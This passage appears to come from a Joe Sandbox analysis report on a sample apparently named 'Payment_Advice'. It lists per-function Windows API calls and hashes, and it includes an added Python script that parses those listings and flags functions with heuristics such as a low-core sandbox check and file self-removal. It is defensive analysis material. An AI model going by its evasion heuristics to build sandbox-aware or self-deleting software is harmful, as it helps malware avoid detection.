                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718869927-0
                                                                                                    • Opcode ID: 6bad9a73ed49ee09c5f5783d06b0115a8e8be62507afe7e904e743c493be4388
                                                                                                    • Instruction ID: be1e5b184eea79fba2690f7d0d7a67c42dc49f3f92ccff984f5b2bc669f89c5f
                                                                                                    • Opcode Fuzzy Hash: 6bad9a73ed49ee09c5f5783d06b0115a8e8be62507afe7e904e743c493be4388
                                                                                                    • Instruction Fuzzy Hash: F5E09BB550024926EF01A764DC0FFEE3F6C6B15789F040851B700DB0E3DA75DA589661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1175261203-0
                                                                                                    • Opcode ID: b8cf21611090411d3803c8dcd94588249362ab490318bbe597ce306f4afd1ef6
                                                                                                    • Instruction ID: 45c4a9a943fa01d1c50ac80aa48f2e230b0acad53d121ce818dabf1148d11e5e
                                                                                                    • Opcode Fuzzy Hash: b8cf21611090411d3803c8dcd94588249362ab490318bbe597ce306f4afd1ef6
                                                                                                    • Instruction Fuzzy Hash: 33E012765011186ADB11A7949C4DFDA7BACBF49391F0400657645D2144D774DAC48AA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

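The function listings in this section are machine-generated and only record which APIs each function calls; an analyst still has to turn them into structured data and decide which functions matter. As an added example (not Joe Sandbox tooling and not code from the sample), the script below parses "APIs" blocks of the form shown above, keeps the "Part of subcall function" entries separate from direct calls, orders direct calls by their call-site address, and applies a small triage rule table. The sample input is constructed from three blocks in this listing (the GetProcessAffinityMask, DeleteFileW and LoadLibraryW functions). The rule notes are hypothetical analyst heuristics: for instance, the report does not say the GetProcessAffinityMask function is a sandbox check, only that the pair is called, and the LoadLibraryW note rests on the "Crypt32.dll" string appearing among the reported stack values, not on a proven argument position.

```python
"""Parse Joe Sandbox per-function "APIs" listings and apply analyst triage rules.

Added example for this report; it is not Joe Sandbox tooling. The rule table is a
hypothetical triage heuristic written for illustration: the report only lists
which APIs each function calls, it does not state what the function is for.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three "APIs" blocks copied from this report's listing,
# trimmed to a few lines each (the parser ignores the Memory Dump Source lines).
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 005110AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 005110B2
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Similarity
• API ID: Process$AffinityCurrentMask
• Instruction Fuzzy Hash: 03E09236F00545A7DF0D87A49C0D9EB7ADDFA5824431041F9E603D7201F934DEC54664
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641,000000FF), ref: 0050A1F1
  • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641), ref: 0050A21F
Similarity
• API ID: DeleteFile$_wcslen
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
• LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
Similarity
• API ID: DirectoryLibraryLoadSystem
"""

# "Name.MODULE(args), ref: ADDR"; the "(args)" part is absent for CRT entries
# such as "_wcslen.LIBCMT ref: 0050BB27".
CALL_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SUBCALL_PREFIX = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                       # reported stack values, "?" where unknown
    ref: int                         # call-site address parsed from hex
    subcall_of: Optional[int] = None  # owning function when listed as a subcall


@dataclass
class Function:
    calls: list = field(default_factory=list)
    api_id: Optional[str] = None
    fuzzy_hash: Optional[str] = None

    def direct_names(self):
        """APIs called directly by this function, in call-site address order."""
        direct = [c for c in self.calls if c.subcall_of is None]
        return [c.name for c in sorted(direct, key=lambda c: c.ref)]


def _split_args(raw):
    return [a.strip() for a in raw.split(",")] if raw else []


def parse_functions(text):
    """Split the listing into one Function per "APIs" header."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop indentation and bullet
        if line == "APIs":
            current = Function()
            functions.append(current)
            continue
        if current is None:
            continue
        if line.startswith("API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
            continue
        if line.startswith("Instruction Fuzzy Hash:"):
            current.fuzzy_hash = line.split(":", 1)[1].strip()
            continue
        owner = None
        sub = SUBCALL_PREFIX.match(line)
        if sub:
            owner = int(sub["fn"], 16)
            line = line[sub.end():]
        m = CALL_RE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], _split_args(m["args"]),
                                         int(m["ref"], 16), owner))
    return functions


# Hypothetical triage rules: every named API must be a direct call of the function.
RULES = [
    ({"GetCurrentProcess", "GetProcessAffinityMask"},
     "reads its own affinity mask; the set bits give a logical-CPU count, a common low-core sandbox check"),
    ({"GetSystemDirectoryW", "LoadLibraryW"},
     "loads a library through a path built under the system directory (absolute-path load)"),
    ({"DeleteFileW"}, "deletes a file: cleanup or self-removal candidate"),
    ({"SetFileAttributesW"}, "changes file attributes: hidden/system attribute candidate"),
]


def triage(fn):
    names = set(fn.direct_names())
    notes = [note for needed, note in RULES if needed <= names]
    for c in fn.calls:                       # surface DLL names seen near LoadLibrary* calls
        if c.name.startswith("LoadLibrary"):
            notes += [f"LoadLibrary call has {a} among its reported stack values"
                      for a in c.args if a.lower().endswith(".dll")]
    return notes


if __name__ == "__main__":
    for fn in parse_functions(SAMPLE):
        print(fn.api_id, fn.direct_names())
        for note in triage(fn):
            print("   -", note)
```

Because the arguments Joe Sandbox prints are raw stack slots at the call site rather than decoded parameters, the rule table keys on API names and call order only; the DLL-name scan is a hint for the analyst, not a claim about which parameter the string occupied.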
                                                                                                    APIs
                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0051A3DA
                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0051A3E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1918208029-0
                                                                                                    • Opcode ID: 3005c95a2a280fff307b9a0f6f4befb985325dc675e5b1b8214a534a7da55276
                                                                                                    • Instruction ID: 376a7b6cca6e6ec6b7cd2705cc5f1b1ac2c94b0cdacf82329517435d24745ad4
                                                                                                    • Opcode Fuzzy Hash: 3005c95a2a280fff307b9a0f6f4befb985325dc675e5b1b8214a534a7da55276
                                                                                                    • Instruction Fuzzy Hash: 32E0E571905219EBEB10DF99C945BD9BFE8FB04360F20845AA89693201E3B4AE84DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

APIs
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00522BAA
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00522BB5
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptd
• String ID:
• API String ID: 1660781231-0
• Opcode ID: acc3aac040c1a6fbe2890a581a3a8fe9eb327f20ca77d5a164b2f5e871889088
• Instruction ID: 90925add3d46dd4a149b4ff7912100798461c6d8d4c1a8cb534652ebbd9ee13f
• Opcode Fuzzy Hash: acc3aac040c1a6fbe2890a581a3a8fe9eb327f20ca77d5a164b2f5e871889088
• Instruction Fuzzy Hash: D6D0223C198332384E242E70380F5493F85BED3BB1FE086DAF820E68C1EF148080A111
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
• Opcode ID: bf19c2da8647c53301f4ed80805944387a9c4d76d6d392f1f9053dbb4ba49869
• Instruction ID: f5520ec2e3548abf02f06c25c8ea2f410a7f50cd21eb42002b7192522f374c6a
• Opcode Fuzzy Hash: bf19c2da8647c53301f4ed80805944387a9c4d76d6d392f1f9053dbb4ba49869
• Instruction Fuzzy Hash: 54C0123245C200BECB010BB8DC09C2BBBA8ABA7312F04C928F0A5C2060C238C154EB11
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,?), ref: 005012E1
• KiUserCallbackDispatcher.NTDLL(00000000), ref: 005012E8
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: CallbackDispatcherItemUser
• String ID:
• API String ID: 4250310104-0
• Opcode ID: 855ccf841796fe0d8efe734e53fa805f5cc604704b77c2e3afec7c43359783a9
• Instruction ID: 649cb66a3f996935ac6f000dc554b04bcb7787f96cda6e9b6ad0fe34644fa621
• Opcode Fuzzy Hash: 855ccf841796fe0d8efe734e53fa805f5cc604704b77c2e3afec7c43359783a9
• Instruction Fuzzy Hash: 1EC04C7640C240BFCB015BA4DC0CC2FBFA9ABA6321F04C819F1A581120C775C514EB11
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 10e3bf728071f5671845e1c19fc983567ef23fffc023f3a95f6a3b261a813ce1
• Instruction ID: 5580f5684ae0b34dbc4a7c5da148d856dd9ba7182ea3a1cb9c0defeebfe8df2f
• Opcode Fuzzy Hash: 10e3bf728071f5671845e1c19fc983567ef23fffc023f3a95f6a3b261a813ce1
• Instruction Fuzzy Hash: 1BC1AE30A00A559BEF25DF68C888BAD7FA5BF55310F0805B9EC46DB3D2DB309944CB66
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 58b7a660ed226e0a42923d389e0d4bd11907e261b82f3c9e78387cb379b083a5
• Instruction ID: 9ec63da5cd07c1fa55e19e8d318e78bd4e25ba3b6f2f91f1301430c481ab6311
• Opcode Fuzzy Hash: 58b7a660ed226e0a42923d389e0d4bd11907e261b82f3c9e78387cb379b083a5
• Instruction Fuzzy Hash: 5C71A171540B459EDB35DB70C8599EBBBEDBF54300F40092EE6AB87281EA326A84CF11
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00508289
  • Part of subcall function 005013DC: __EH_prolog.LIBCMT ref: 005013E1
  • Part of subcall function 0050A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
• Opcode ID: 53d0b7438c05a336879d59d9f3fe8067e12119655016a0fa4ec89f93d0e766cd
• Instruction ID: 324f2bff8ba8a32b8b3ce7c53c2c19536e8e14c40a80f51f26d61667ae39ecd0
• Opcode Fuzzy Hash: 53d0b7438c05a336879d59d9f3fe8067e12119655016a0fa4ec89f93d0e766cd
• Instruction Fuzzy Hash: 0E4184719446599ADF20DB60CC59EFEBBA8BF80304F4404EAE58A970C3EB756EC5CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 005013E1
  • Part of subcall function 00505E37: __EH_prolog.LIBCMT ref: 00505E3C
  • Part of subcall function 0050CE40: __EH_prolog.LIBCMT ref: 0050CE45
  • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: f9d2ba6c2314425f36e922fbf127b7ce017df65ce0b3b8c3859ffb689e26970f
• Instruction ID: b99f464a95b8d330d1c2430d63390680a4961dc98693cd0c35896121dddc93fc
• Opcode Fuzzy Hash: f9d2ba6c2314425f36e922fbf127b7ce017df65ce0b3b8c3859ffb689e26970f
• Instruction Fuzzy Hash: 794149B0905B419EE724DF398889AEAFFE5BF19300F50492ED5FE83282CB716654CB15
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 005013E1
  • Part of subcall function 00505E37: __EH_prolog.LIBCMT ref: 00505E3C
  • Part of subcall function 0050CE40: __EH_prolog.LIBCMT ref: 0050CE45
  • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
• Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: c9629419fdc14a0bef445e474c437bd97c28937a9ce04683047df9a0ad313fda
• Instruction ID: c8439dddda81735c450bbd96faa1f3a57accfa570d57f1ac2895fd958be1ad0c
• Opcode Fuzzy Hash: c9629419fdc14a0bef445e474c437bd97c28937a9ce04683047df9a0ad313fda
• Instruction Fuzzy Hash: 864147B0905B419EE724DF798889AEAFFE5BF19300F50492ED5FE83282CB716654CB11
Uniqueness
Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051B098
                                                                                                      • Part of subcall function 005013DC: __EH_prolog.LIBCMT ref: 005013E1
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0052ACF8
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0051DA57
                                                                                                      • Part of subcall function 00510659: _wcslen.LIBCMT ref: 0051066F
                                                                                                      • Part of subcall function 00507B0D: __EH_prolog.LIBCMT ref: 00507B12
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2838827086-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0052B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052B177
                                                                                                    • _free.LIBCMT ref: 0052C4E5
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052B177
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00523C3F
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 190572456-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00505AC2
                                                                                                      • Part of subcall function 0050B505: __EH_prolog.LIBCMT ref: 0050B50A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,005095D6,?,?,?,?,?,00532641,000000FF), ref: 0050963B
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 2591292051-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0050A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6C4
                                                                                                      • Part of subcall function 0050A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6F2
                                                                                                      • Part of subcall function 0050A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0050A592,000000FF,?,?), ref: 0050A6FE
                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1464966427-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00510E3D
                                                                                                    Similarity
                                                                                                    • API ID: ExecutionStateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2211380416-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0051A62C
                                                                                                      • Part of subcall function 0051A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0051A3DA
                                                                                                    Similarity
                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                    • String ID:
                                                                                                    • API String ID: 1915507550-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00511B3E), ref: 0051DD92
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                    • String ID:
